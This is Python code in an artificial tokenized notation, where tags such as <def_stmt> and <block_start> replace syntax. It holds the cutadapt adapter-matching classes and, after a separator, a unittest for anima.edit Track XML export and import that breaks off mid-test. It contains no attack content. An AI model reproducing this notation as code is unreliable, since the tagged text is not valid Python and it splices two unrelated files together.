<block_start><return>slice(<none> self.rstart)<block_end><def_stmt>trimmed self read<block_start><return>read[:self.rstart]<block_end><def_stmt>adjacent_base self<arrow>str<block_start><return>self.sequence[self.rstart-1:self.rstart]<block_end><def_stmt>removed_sequence_length self<arrow>int<block_start><return>len(self.sequence)-self.rstart<block_end><block_end><def_stmt>_generate_adapter_name _start=[1]<arrow>str<block_start>name=str(_start[0])<line_sep>_start[0]<augadd>1<line_sep><return>name<block_end><class_stmt>Matchable(ABC)<block_start>"""Something that has a match_to() method."""<def_stmt>__init__ self name:str *args **kwargs<block_start>self.name=name<block_end>@abstractmethod<def_stmt>enable_debug self<block_start><pass><block_end>@abstractmethod<def_stmt>match_to self sequence:str<block_start><pass><block_end><block_end><class_stmt>Adapter(Matchable ABC)<block_start>description="adapter with one component"# this is overriden in subclasses
@abstractmethod<def_stmt>spec self<arrow>str<block_start>"""Return string representation of this adapter"""<block_end>@abstractmethod<def_stmt>create_statistics self<arrow>AdapterStatistics<block_start><pass><block_end>@abstractmethod<def_stmt>descriptive_identifier self<arrow>str<block_start><pass><block_end><block_end><class_stmt>SingleAdapter(Adapter ABC)<block_start>"""
This class can find a single adapter characterized by sequence, error rate,
type etc. within reads.
where -- A Where enum value. This influences where the adapter is allowed to appear within the
read.
sequence -- The adapter sequence as string. Will be converted to uppercase.
Also, Us will be converted to Ts.
max_errors -- Maximum allowed errors (non-negative float). If the values is less than 1, this is
interpreted as a rate directly and passed to the aligner. If it is 1 or greater, the value
is converted to a rate by dividing it by the length of the sequence.
The error rate is the number of errors in the alignment divided by the length
of the part of the alignment that matches the adapter.
minimum_overlap -- Minimum length of the part of the alignment
that matches the adapter.
read_wildcards -- Whether IUPAC wildcards in the read are allowed.
adapter_wildcards -- Whether IUPAC wildcards in the adapter are
allowed.
name -- optional name of the adapter. If not provided, the name is set to a
unique number.
"""<line_sep>allows_partial_matches:bool=<true><def_stmt>__init__ self sequence:str max_errors:float=0.1 min_overlap:int=3 read_wildcards:bool=<false> adapter_wildcards:bool=<true> name:Optional[str]=<none> indels:bool=<true> <block_start>self.name:str=_generate_adapter_name()<if>name<is><none><else>name<line_sep>super().__init__(self.name)<line_sep>self._debug:bool=<false><line_sep>self.sequence:str=sequence.upper().replace("U" "T")<if_stmt><not>self.sequence<block_start><raise>ValueError("Adapter sequence is empty")<block_end><if_stmt>max_errors<ge>1<block_start>max_errors<augdiv>len(self.sequence)<block_end>self.max_error_rate:float=max_errors<line_sep>self.min_overlap:int=min(min_overlap len(self.sequence))<line_sep>iupac=frozenset('ABCDGHKMNRSTUVWXY')<if_stmt>adapter_wildcards<and><not>set(self.sequence)<le>iupac<block_start><for_stmt>c self.sequence<block_start><if_stmt>c<not><in>iupac<block_start><if_stmt>c<eq>"I"<block_start>extra="For inosine, consider using N instead and please comment "<concat>"on <https://github.com/marcelm/cutadapt/issues/546>."<block_end><else_stmt><block_start>extra="Use only characters 'ABCDGHKMNRSTUVWXY'."<block_end><raise>InvalidCharacter(f"Character '{c}' in adapter sequence '{self.sequence}' is "<concat>f"not a valid IUPAC code. {extra}")<block_end><block_end><block_end># Optimization: Use non-wildcard matching if only ACGT is used
self.adapter_wildcards:bool=adapter_wildcards<and><not>set(self.sequence)<le>set("ACGT")<line_sep>self.read_wildcards:bool=read_wildcards<line_sep>self.indels:bool=indels<line_sep>self.aligner=self._aligner()<block_end><def_stmt>_make_aligner self flags:int<arrow>Aligner# TODO
# Indels are suppressed by setting their cost very high, but a different algorithm
# should be used instead.
<block_start>indel_cost=1<if>self.indels<else>100000<line_sep><return>Aligner(self.sequence self.max_error_rate flags=flags wildcard_ref=self.adapter_wildcards wildcard_query=self.read_wildcards indel_cost=indel_cost min_overlap=self.min_overlap )<block_end><def_stmt>__repr__ self<block_start><return>'<{cls}(name={name!r}, sequence={sequence!r}, '<concat>'max_error_rate={max_error_rate}, min_overlap={min_overlap}, '<concat>'read_wildcards={read_wildcards}, '<concat>'adapter_wildcards={adapter_wildcards}, '<concat>'indels={indels})>'.format(cls=self.__class__.__name__ **vars(self))<block_end>@property<def_stmt>effective_length self<arrow>int<block_start><return>self.aligner.effective_length<block_end><def_stmt>enable_debug self<arrow><none><block_start>"""
Print out the dynamic programming matrix after matching a read to an
adapter.
"""<line_sep>self._debug=<true><line_sep>self.aligner.enable_debug()<block_end>@abstractmethod<def_stmt>_aligner self<block_start><pass><block_end>@abstractmethod<def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given string.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<block_end><def_stmt>__len__ self<arrow>int<block_start><return>len(self.sequence)<block_end><block_end><class_stmt>FrontAdapter(SingleAdapter)<block_start>"""A 5' adapter"""<line_sep>description="regular 5'"<def_stmt>__init__ self *args **kwargs<block_start>self._force_anywhere=kwargs.pop("force_anywhere" <false>)<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"regular_five_prime"<block_end><def_stmt>_aligner self<arrow>Aligner<block_start><return>self._make_aligner(Where.ANYWHERE.value<if>self._force_anywhere<else>Where.FRONT.value)<block_end><def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given read.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<line_sep>alignment:Optional[Tuple[int int int int int int]]=self.aligner.locate(sequence)<if_stmt>self._debug<block_start>print(self.aligner.dpmatrix)<block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveBeforeMatch(*alignment adapter=self sequence=sequence)<block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}..."<block_end><def_stmt>create_statistics self<arrow>FrontAdapterStatistics<block_start><return>FrontAdapterStatistics(self)<block_end><block_end><class_stmt>BackAdapter(SingleAdapter)<block_start>"""A 3' adapter"""<line_sep>description="regular 3'"<def_stmt>__init__ self *args **kwargs<block_start>self._force_anywhere=kwargs.pop("force_anywhere" <false>)<line_sep>super().__init__(*args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"regular_three_prime"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.ANYWHERE.value<if>self._force_anywhere<else>Where.BACK.value)<block_end><def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given read.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<line_sep>alignment:Optional[Tuple[int int int int int int]]=self.aligner.locate(sequence)<if_stmt>self._debug<block_start>print(self.aligner.dpmatrix)# pragma: no cover
<block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveAfterMatch(*alignment adapter=self sequence=sequence)<block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}"<block_end><def_stmt>create_statistics self<arrow>BackAdapterStatistics<block_start><return>BackAdapterStatistics(self)<block_end><block_end><class_stmt>AnywhereAdapter(SingleAdapter)<block_start>"""
An adapter that can be 5' or 3'. If a match involves the first base of
the read, it is assumed to be a 5' adapter and a 3' otherwise.
"""<line_sep>description="variable 5'/3'"<def_stmt>descriptive_identifier self<arrow>str<block_start><return>"anywhere"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.ANYWHERE.value)<block_end><def_stmt>match_to self sequence:str<block_start>"""
Attempt to match this adapter to the given string.
Return a Match instance if a match was found;
return None if no match was found given the matching criteria (minimum
overlap length, maximum error rate).
"""<line_sep>alignment=self.aligner.locate(sequence.upper())<if_stmt>self._debug<block_start>print(self.aligner.dpmatrix)<block_end><if_stmt>alignment<is><none><block_start><return><none><block_end># guess: if alignment starts at pos 0, it’s a 5' adapter
<if_stmt>alignment[2]<eq>0# index 2 is rstart
<block_start>match=RemoveBeforeMatch(*alignment adapter=self sequence=sequence)# type: ignore
<block_end><else_stmt><block_start>match=RemoveAfterMatch(*alignment adapter=self sequence=sequence)# type: ignore
<block_end><return>match<block_end><def_stmt>spec self<arrow>str<block_start><return>f"...{self.sequence}..."<block_end><def_stmt>create_statistics self<arrow>AnywhereAdapterStatistics<block_start><return>AnywhereAdapterStatistics(self)<block_end><block_end><class_stmt>NonInternalFrontAdapter(FrontAdapter)<block_start>"""A non-internal 5' adapter"""<line_sep>description="non-internal 5'"<def_stmt>descriptive_identifier self<arrow>str<block_start><return>"noninternal_five_prime"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.FRONT_NOT_INTERNAL.value)<block_end><def_stmt>match_to self sequence:str# The locate function takes care of uppercasing the sequence
<block_start>alignment=self.aligner.locate(sequence)<if_stmt>self._debug<block_start><try_stmt><block_start>print(self.aligner.dpmatrix)<block_end><except_stmt>AttributeError<block_start><pass><block_end><block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveBeforeMatch(*alignment adapter=self sequence=sequence)<block_end># type: ignore
<def_stmt>spec self<arrow>str<block_start><return>f"X{self.sequence}..."<block_end><block_end><class_stmt>NonInternalBackAdapter(BackAdapter)<block_start>"""A non-internal 3' adapter"""<line_sep>description="non-internal 3'"<def_stmt>descriptive_identifier self<arrow>str<block_start><return>"noninternal_three_prime"<block_end><def_stmt>_aligner self<block_start><return>self._make_aligner(Where.BACK_NOT_INTERNAL.value)<block_end><def_stmt>match_to self sequence:str# The locate function takes care of uppercasing the sequence
<block_start>alignment=self.aligner.locate(sequence)<if_stmt>self._debug<block_start><try_stmt><block_start>print(self.aligner.dpmatrix)# pragma: no cover
<block_end><except_stmt>AttributeError<block_start><pass><block_end><block_end><if_stmt>alignment<is><none><block_start><return><none><block_end><return>RemoveAfterMatch(*alignment adapter=self sequence=sequence)<block_end># type: ignore
<def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}X"<block_end><block_end><class_stmt>PrefixAdapter(NonInternalFrontAdapter)<block_start>"""An anchored 5' adapter"""<line_sep>description="anchored 5'"<line_sep>allows_partial_matches=<false><def_stmt>__init__ self sequence:str *args **kwargs<block_start>kwargs["min_overlap"]=len(sequence)<line_sep>super().__init__(sequence *args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"anchored_five_prime"<block_end><def_stmt>_aligner self<block_start><if_stmt><not>self.indels# TODO or if error rate allows 0 errors anyway
<block_start><return>PrefixComparer(self.sequence self.max_error_rate wildcard_ref=self.adapter_wildcards wildcard_query=self.read_wildcards min_overlap=self.min_overlap)<block_end><else_stmt><block_start><return>self._make_aligner(Where.PREFIX.value)<block_end><block_end><def_stmt>spec self<arrow>str<block_start><return>f"^{self.sequence}..."<block_end><block_end><class_stmt>SuffixAdapter(NonInternalBackAdapter)<block_start>"""An anchored 3' adapter"""<line_sep>description="anchored 3'"<line_sep>allows_partial_matches=<false><def_stmt>__init__ self sequence:str *args **kwargs<block_start>kwargs["min_overlap"]=len(sequence)<line_sep>super().__init__(sequence *args **kwargs)<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"anchored_three_prime"<block_end><def_stmt>_aligner self<block_start><if_stmt><not>self.indels# TODO or if error rate allows 0 errors anyway
<block_start><return>SuffixComparer(self.sequence self.max_error_rate wildcard_ref=self.adapter_wildcards wildcard_query=self.read_wildcards min_overlap=self.min_overlap)<block_end><else_stmt><block_start><return>self._make_aligner(Where.SUFFIX.value)<block_end><block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.sequence}$"<block_end><block_end><class_stmt>LinkedMatch(Match)<block_start>"""
Represent a match of a LinkedAdapter
"""<def_stmt>__init__ self front_match:RemoveBeforeMatch back_match:RemoveAfterMatch adapter:"LinkedAdapter"<block_start><assert_stmt>front_match<is><not><none><or>back_match<is><not><none><line_sep>self.front_match:RemoveBeforeMatch=front_match<line_sep>self.back_match:RemoveAfterMatch=back_match<line_sep>self.adapter:LinkedAdapter=adapter<block_end><def_stmt>__repr__ self<block_start><return>'<LinkedMatch(front_match={!r}, back_match={}, adapter={})>'.format(self.front_match self.back_match self.adapter)<block_end>@property<def_stmt>matches self<block_start>"""Number of matching bases"""<line_sep>m=0<if_stmt>self.front_match<is><not><none><block_start>m<augadd>self.front_match.matches<block_end><if_stmt>self.back_match<is><not><none><block_start>m<augadd>self.back_match.matches<block_end><return>m<block_end>@property<def_stmt>errors self<block_start>e=0<if_stmt>self.front_match<is><not><none><block_start>e<augadd>self.front_match.errors<block_end><if_stmt>self.back_match<is><not><none><block_start>e<augadd>self.back_match.errors<block_end><return>e<block_end><def_stmt>trimmed self read<block_start><if_stmt>self.front_match<block_start>read=self.front_match.trimmed(read)<block_end><if_stmt>self.back_match<block_start>read=self.back_match.trimmed(read)<block_end><return>read<block_end><def_stmt>remainder_interval self<arrow>Tuple[int int]<block_start>matches=[match<for>match [self.front_match self.back_match]<if>match<is><not><none>]<line_sep><return>remainder(matches)<block_end><def_stmt>retained_adapter_interval self<arrow>Tuple[int int]<block_start><if_stmt>self.front_match<block_start>start=self.front_match.rstart<line_sep>offset=self.front_match.rstop<block_end><else_stmt><block_start>start=offset=0<block_end><if_stmt>self.back_match<block_start>end=self.back_match.rstop+offset<block_end><else_stmt><block_start>end=len(self.front_match.sequence)<block_end><return>start end<block_end><def_stmt>get_info_records self read<arrow>List[List]<block_start>records=[]<for_stmt>match,namesuffix [(self.front_match ";1") (self.back_match ";2") ]<block_start><if_stmt>match<is><none><block_start><continue><block_end>record=match.get_info_records(read)[0]<line_sep>record[7]=("none"<if>self.adapter.name<is><none><else>self.adapter.name)+namesuffix<line_sep>records.append(record)<line_sep>read=match.trimmed(read)<block_end><return>records<block_end><block_end><class_stmt>LinkedAdapter(Adapter)<block_start>"""A 5' adapter combined with a 3' adapter"""<line_sep>description="linked"<def_stmt>__init__ self front_adapter:SingleAdapter back_adapter:SingleAdapter front_required:bool back_required:bool name:str <block_start>super().__init__(name)<line_sep>self.front_required=front_required<line_sep>self.back_required=back_required<line_sep># The following attributes are needed for the report
self.where="linked"<line_sep>self.name=_generate_adapter_name()<if>name<is><none><else>name<line_sep>self.front_adapter=front_adapter<line_sep>self.front_adapter.name=self.name<line_sep>self.back_adapter=back_adapter<block_end><def_stmt>descriptive_identifier self<arrow>str<block_start><return>"linked"<block_end><def_stmt>enable_debug self<block_start>self.front_adapter.enable_debug()<line_sep>self.back_adapter.enable_debug()<block_end><def_stmt>match_to self sequence:str<arrow>Optional[LinkedMatch]<block_start>"""
Match the two linked adapters against a string
"""<line_sep>front_match=self.front_adapter.match_to(sequence)<if_stmt>self.front_required<and>front_match<is><none><block_start><return><none><block_end><if_stmt>front_match<is><not><none><block_start>sequence=sequence[front_match.trim_slice()]<block_end>back_match=self.back_adapter.match_to(sequence)<if_stmt>back_match<is><none><and>(self.back_required<or>front_match<is><none>)<block_start><return><none><block_end><return>LinkedMatch(front_match back_match self)<block_end><def_stmt>create_statistics self<arrow>LinkedAdapterStatistics<block_start><return>LinkedAdapterStatistics(self front=self.front_adapter back=self.back_adapter)<block_end>@property<def_stmt>sequence self<block_start><return>self.front_adapter.sequence+"..."+self.back_adapter.sequence<block_end>@property<def_stmt>remove self<block_start><return><none><block_end><def_stmt>spec self<arrow>str<block_start><return>f"{self.front_adapter.spec()}...{self.back_adapter.spec()}"<block_end><block_end><class_stmt>MultipleAdapters(Matchable)<block_start>"""
Represent multiple adapters at once
"""<def_stmt>__init__ self adapters:Sequence[Matchable]<block_start>super().__init__(name="multiple_adapters")<line_sep>self._adapters=adapters<block_end><def_stmt>enable_debug self<block_start><for_stmt>a self._adapters<block_start>a.enable_debug()<block_end><block_end><def_stmt>__getitem__ self item<block_start><return>self._adapters[item]<block_end><def_stmt>__len__ self<block_start><return>len(self._adapters)<block_end><def_stmt>match_to self sequence:str<arrow>Optional[SingleMatch]<block_start>"""
Find the adapter that best matches the sequence.
Return either a Match instance or None if there are no matches.
"""<line_sep>best_match=<none><for_stmt>adapter self._adapters<block_start>match=adapter.match_to(sequence)<if_stmt>match<is><none><block_start><continue><block_end># the no. of matches determines which adapter fits best
<if_stmt>best_match<is><none><or>match.matches<g>best_match.matches<or>(match.matches<eq>best_match.matches<and>match.errors<l>best_match.errors)<block_start>best_match=match<block_end><block_end><return>best_match<block_end><block_end><class_stmt>IndexedAdapters(Matchable ABC)<block_start>"""
Represent multiple adapters of the same type at once and use an index data structure
to speed up matching. This acts like a "normal" Adapter as it provides a match_to
method, but is faster with lots of adapters.
There are quite a few restrictions:
- the error rate allows at most 2 mismatches
- wildcards in the adapter are not allowed
- wildcards in the read are not allowed
Use the is_acceptable() method to check individual adapters.
"""<line_sep>AdapterIndex=Dict[str Tuple[SingleAdapter int int]]<def_stmt>__init__ self adapters<block_start>"""All given adapters must be of the same type"""<line_sep>super().__init__(name="indexed_adapters")<if_stmt><not>adapters<block_start><raise>ValueError("Adapter list is empty")<block_end><for_stmt>adapter adapters<block_start>self._accept(adapter)<block_end>self._adapters=adapters<line_sep>self._multiple_adapters=MultipleAdapters(adapters)<line_sep>self._lengths,self._index=self._make_index()<line_sep>logger.debug("String lengths in the index: %s" sorted(self._lengths reverse=<true>))<if_stmt>len(self._lengths)<eq>1<block_start>self._length=self._lengths[0]<line_sep>self.match_to=self._match_to_one_length<block_end><else_stmt><block_start>self.match_to=self._match_to_multiple_lengths<block_end>self._make_affix=self._get_make_affix()<block_end><def_stmt>__repr__ self<block_start><return>f"{self.__class__.__name__}(adapters={self._adapters!r})"<block_end><def_stmt>match_to self sequence:str<block_start>"""Never called because it gets overwritten in __init__"""<block_end>@abstractmethod<def_stmt>_get_make_affix self<block_start><pass><block_end>@abstractmethod<def_stmt>_make_match self adapter length matches errors sequence<arrow>SingleMatch<block_start><pass><block_end>@classmethod<def_stmt>_accept cls adapter<block_start>"""Raise a ValueError if the adapter is not acceptable"""<if_stmt>adapter.read_wildcards<block_start><raise>ValueError("Wildcards in the read not supported")<block_end><if_stmt>adapter.adapter_wildcards<block_start><raise>ValueError("Wildcards in the adapter not supported")<block_end>k=int(len(adapter)<times>adapter.max_error_rate)<if_stmt>k<g>2<block_start><raise>ValueError("Error rate too high")<block_end><block_end>@classmethod<def_stmt>is_acceptable cls adapter<block_start>"""
Return whether this adapter is acceptable for being used in an index
Adapters are not acceptable if they allow wildcards, allow too many errors,
or would lead to a very large index.
"""<try_stmt><block_start>cls._accept(adapter)<block_end><except_stmt>ValueError<block_start><return><false><block_end><return><true><block_end><def_stmt>_make_index self<arrow>Tuple[List[int] "AdapterIndex"]<block_start>logger.info('Building index of %s adapters ...' len(self._adapters))<line_sep>index:Dict[str Tuple[SingleAdapter int int]]=dict()<line_sep>lengths=set()<line_sep>has_warned=<false><for_stmt>adapter self._adapters<block_start>sequence=adapter.sequence<line_sep>k=int(adapter.max_error_rate<times>len(sequence))<line_sep>environment=edit_environment<if>adapter.indels<else>hamming_environment<for_stmt>s,errors,matches environment(sequence k)<block_start><if_stmt>s<in>index<block_start>other_adapter,other_errors,other_matches=index[s]<if_stmt>matches<l>other_matches<block_start><continue><block_end><if_stmt>other_matches<eq>matches<and><not>has_warned<block_start>logger.warning("Adapters %s %r and %s %r are very similar. At %s allowed errors, "<concat>"the sequence %r cannot be assigned uniquely because the number of "<concat>"matches is %s compared to both adapters." other_adapter.name other_adapter.sequence adapter.name adapter.sequence k s matches)<line_sep>has_warned=<true><block_end><block_end><else_stmt><block_start>index[s]=(adapter errors matches)<block_end>lengths.add(len(s))<block_end><block_end>logger.info('Built an index containing %s strings.' len(index))<line_sep><return>sorted(lengths reverse=<true>) index<block_end><def_stmt>_match_to_one_length self sequence:str<block_start>"""
Match the adapters against a string and return a Match that represents
the best match or None if no match was found
"""<line_sep>affix=self._make_affix(sequence.upper() self._length)<if_stmt>"N"<in>affix# Fall back to non-indexed matching
<block_start><return>self._multiple_adapters.match_to(sequence)<block_end><try_stmt><block_start>adapter,e,m=self._index[affix]<block_end><except_stmt>KeyError<block_start><return><none><block_end><return>self._make_match(adapter self._length m e sequence)<block_end><def_stmt>_match_to_multiple_lengths self sequence:str<block_start>"""
Match the adapters against a string and return a Match that represents
the best match or None if no match was found
"""<line_sep>affix=sequence.upper()<line_sep># Check all the prefixes or suffixes (affixes) that could match
best_adapter:Optional[SingleAdapter]=<none><line_sep>best_length=0<line_sep>best_m=-1<line_sep>best_e=1000<line_sep>check_n=<true><for_stmt>length self._lengths<block_start><if_stmt>length<l>best_m# No chance of getting the same or a higher number of matches, so we can stop early
<block_start><break><block_end>affix=self._make_affix(affix length)<if_stmt>check_n<block_start><if_stmt>"N"<in>affix<block_start><return>self._multiple_adapters.match_to(sequence)<block_end>check_n=<false><block_end><try_stmt><block_start>adapter,e,m=self._index[affix]<block_end><except_stmt>KeyError<block_start><continue><block_end><if_stmt>m<g>best_m<or>(m<eq>best_m<and>e<l>best_e)# TODO this could be made to work:
# assert best_m == -1
<block_start>best_adapter=adapter<line_sep>best_e=e<line_sep>best_m=m<line_sep>best_length=length<block_end><block_end><if_stmt>best_m<eq>-1<block_start><return><none><block_end><else_stmt><block_start><return>self._make_match(best_adapter best_length best_m best_e sequence)<block_end><block_end><def_stmt>enable_debug self<block_start><pass><block_end><block_end><class_stmt>IndexedPrefixAdapters(IndexedAdapters)<block_start>@classmethod<def_stmt>_accept cls adapter<block_start><if_stmt><not>isinstance(adapter PrefixAdapter)<block_start><raise>ValueError("Only 5' anchored adapters are allowed")<block_end><return>super()._accept(adapter)<block_end><def_stmt>_make_match self adapter length matches errors sequence<block_start><return>RemoveBeforeMatch(astart=0 astop=len(adapter.sequence) rstart=0 rstop=length matches=matches errors=errors adapter=adapter sequence=sequence )<block_end><def_stmt>_get_make_affix self<block_start><return>self._make_prefix<block_end>@staticmethod<def_stmt>_make_prefix s n<block_start><return>s[:n]<block_end><block_end><class_stmt>IndexedSuffixAdapters(IndexedAdapters)<block_start>@classmethod<def_stmt>_accept cls adapter<block_start><if_stmt><not>isinstance(adapter SuffixAdapter)<block_start><raise>ValueError("Only anchored 3' adapters are allowed")<block_end><return>super()._accept(adapter)<block_end><def_stmt>_make_match self adapter length matches errors sequence<block_start><return>RemoveAfterMatch(astart=0 astop=len(adapter.sequence) rstart=len(sequence)-length rstop=len(sequence) matches=matches errors=errors adapter=adapter sequence=sequence )<block_end><def_stmt>_get_make_affix self<block_start><return>self._make_suffix<block_end>@staticmethod<def_stmt>_make_suffix s n<block_start><return>s[-n:]<block_end><block_end><def_stmt>warn_duplicate_adapters adapters<block_start>d=dict()<for_stmt>adapter adapters<block_start>key=(adapter.__class__ adapter.sequence)<if_stmt>key<in>d<block_start>logger.warning("Adapter %r (%s) was specified multiple times! "<concat>"Please make sure that this is what you want." adapter.sequence adapter.description)<block_end>d[key]=adapter.name<block_end><block_end><def_stmt>remainder matches:Sequence[Match]<arrow>Tuple[int int]<block_start>"""
Determine which section of the read would not be trimmed. Return a tuple (start, stop)
that gives the interval of the untrimmed part relative to the original read.
matches must be non-empty
"""<if_stmt><not>matches<block_start><raise>ValueError("matches must not be empty")<block_end>start=0<for_stmt>match matches<block_start>match_start,match_stop=match.remainder_interval()<line_sep>start<augadd>match_start<block_end>length=match_stop-match_start<line_sep><return>(start start+length)<block_end> |
# -*- coding: utf-8 -*-
<import_stmt>unittest<import_from_stmt>anima.edit Track Clip File<class_stmt>TrackTestCase(unittest.TestCase)<block_start>"""tests the anima.previs.Track class
"""<def_stmt>test_to_xml_method_is_working_properly self<block_start>"""testing if the to xml method is working properly
"""<line_sep>t=Track()<line_sep>t.enabled=<true><line_sep>t.locked=<false><line_sep># clip 1
f=File()<line_sep>f.duration=34<line_sep>f.name='shot2'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>c=Clip()<line_sep>c.id='shot2'<line_sep>c.start=1<line_sep>c.end=35<line_sep>c.name='shot2'<line_sep>c.enabled=<true><line_sep>c.duration=34<line_sep>c.in_=0<line_sep>c.out=34<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 2
f=File()<line_sep>f.duration=30<line_sep>f.name='shot'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov'<line_sep>c=Clip()<line_sep>c.id='shot'<line_sep>c.start=35<line_sep>c.end=65<line_sep>c.name='shot'<line_sep>c.enabled=<true><line_sep>c.duration=30<line_sep>c.in_=0<line_sep>c.out=30<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep># clip 3
f=File()<line_sep>f.duration=45<line_sep>f.name='shot1'<line_sep>f.pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov'<line_sep>c=Clip()<line_sep>c.id='shot1'<line_sep>c.start=65<line_sep>c.end=110<line_sep>c.name='shot1'<line_sep>c.enabled=<true><line_sep>c.duration=45<line_sep>c.in_=0<line_sep>c.out=45<line_sep>c.file=f<line_sep>t.clips.append(c)<line_sep>expected_xml="""<track>
<locked>FALSE</locked>
<enabled>TRUE</enabled>
<clipitem id="shot2">
<end>35</end>
<name>shot2</name>
<enabled>True</enabled>
<start>1</start>
<in>0</in>
<duration>34</duration>
<out>34</out>
<file id="shot2.mov">
<duration>34</duration>
<name>shot2</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov</pathurl>
</file>
</clipitem>
<clipitem id="shot">
<end>65</end>
<name>shot</name>
<enabled>True</enabled>
<start>35</start>
<in>0</in>
<duration>30</duration>
<out>30</out>
<file id="shot.mov">
<duration>30</duration>
<name>shot</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov</pathurl>
</file>
</clipitem>
<clipitem id="shot1">
<end>110</end>
<name>shot1</name>
<enabled>True</enabled>
<start>65</start>
<in>0</in>
<duration>45</duration>
<out>45</out>
<file id="shot1.mov">
<duration>45</duration>
<name>shot1</name>
<pathurl>file://localhost/home/eoyilmaz/maya/projects/default/data/shot1.mov</pathurl>
</file>
</clipitem>
</track>"""<line_sep>self.assertEqual(expected_xml t.to_xml())<block_end><def_stmt>test_from_xml_method_is_working_properly self<block_start>"""testing if the from_xml method will fill object attributes from the
given xml node
"""<import_from_stmt>xml.etree ElementTree<line_sep>track_node=ElementTree.Element('track')<line_sep>locked_node=ElementTree.SubElement(track_node 'locked')<line_sep>locked_node.text='FALSE'<line_sep>enabled_node=ElementTree.SubElement(track_node 'enabled')<line_sep>enabled_node.text='TRUE'<line_sep># clip1
clip_node=ElementTree.SubElement(track_node 'clipitem' attrib={'id':'shot2'})<line_sep>end_node=ElementTree.SubElement(clip_node 'end')<line_sep>end_node.text='35'<line_sep>name_node=ElementTree.SubElement(clip_node 'name')<line_sep>name_node.text='shot2'<line_sep>enabled_node=ElementTree.SubElement(clip_node 'enabled')<line_sep>enabled_node.text='True'<line_sep>start_node=ElementTree.SubElement(clip_node 'start')<line_sep>start_node.text='1'<line_sep>in_node=ElementTree.SubElement(clip_node 'in')<line_sep>in_node.text='0'<line_sep>duration_node=ElementTree.SubElement(clip_node 'duration')<line_sep>duration_node.text='34'<line_sep>out_node=ElementTree.SubElement(clip_node 'out')<line_sep>out_node.text='34'<line_sep>file_node=ElementTree.SubElement(clip_node 'file')<line_sep>duration_node=ElementTree.SubElement(file_node 'duration')<line_sep>duration_node.text='34'<line_sep>name_node=ElementTree.SubElement(file_node 'name')<line_sep>name_node.text='shot2'<line_sep>pathurl_node=ElementTree.SubElement(file_node 'pathurl')<line_sep>pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot2.mov'<line_sep>pathurl_node.text=pathurl<line_sep># clip2
clip_node=ElementTree.SubElement(track_node 'clipitem' attrib={'id':'shot'})<line_sep>end_node=ElementTree.SubElement(clip_node 'end')<line_sep>end_node.text='65'<line_sep>name_node=ElementTree.SubElement(clip_node 'name')<line_sep>name_node.text='shot'<line_sep>enabled_node=ElementTree.SubElement(clip_node 'enabled')<line_sep>enabled_node.text='True'<line_sep>start_node=ElementTree.SubElement(clip_node 'start')<line_sep>start_node.text='35'<line_sep>in_node=ElementTree.SubElement(clip_node 'in')<line_sep>in_node.text='0'<line_sep>duration_node=ElementTree.SubElement(clip_node 'duration')<line_sep>duration_node.text='30'<line_sep>out_node=ElementTree.SubElement(clip_node 'out')<line_sep>out_node.text='30'<line_sep>file_node=ElementTree.SubElement(clip_node 'file')<line_sep>duration_node=ElementTree.SubElement(file_node 'duration')<line_sep>duration_node.text='30'<line_sep>name_node=ElementTree.SubElement(file_node 'name')<line_sep>name_node.text='shot'<line_sep>pathurl_node=ElementTree.SubElement(file_node 'pathurl')<line_sep>pathurl='file://localhost/home/eoyilmaz/maya/projects/default/data/shot.mov'<line_sep>pathurl_node.text=pathurl<line_sep># clip3
clip_node=ElementTree.SubElement(track_node 'clipitem' attrib={'id':'shot1'})<line_sep>end_node=ElementTree.SubElement(clip_node 'end')<line_sep>end_node.text='110'<line_sep>name_node=ElementTree.SubElement(clip_node 'name')<line_sep>name_node.text='shot1'<line_sep>enabled_node=ElementTree.SubElement(clip_node 'enabled')<line_sep>enabled_node.text='True'<line_sep>start_node=ElementTree.SubElement(clip_node 'start')<line_sep>start_node.text='65'<line_sep>in_node=ElementTree.SubElement(clip_node 'in')<line_sep>in_node.text='0'<line_sep>duration_node=ElementTree.SubElement(clip_node 'duration')<line_sep>duration_node.text='45'<line_sep>out_node=ElementTree.SubElement(clip_node 'out')<line_sep>out_node.text='45'<line_sep>file_node=ElementTree.SubElement(clip_node 'file')<line_sep>duration_node=ElementTree.SubElement(file_node 'duration')<line_sep>duration_node.text='45'<line_sep>name_node=ElementTree.SubElement(file_node 'name')<line_sep>name_node.text='shot1'<line_sep>pathurl_node=ElementTree.SubElement(file_node 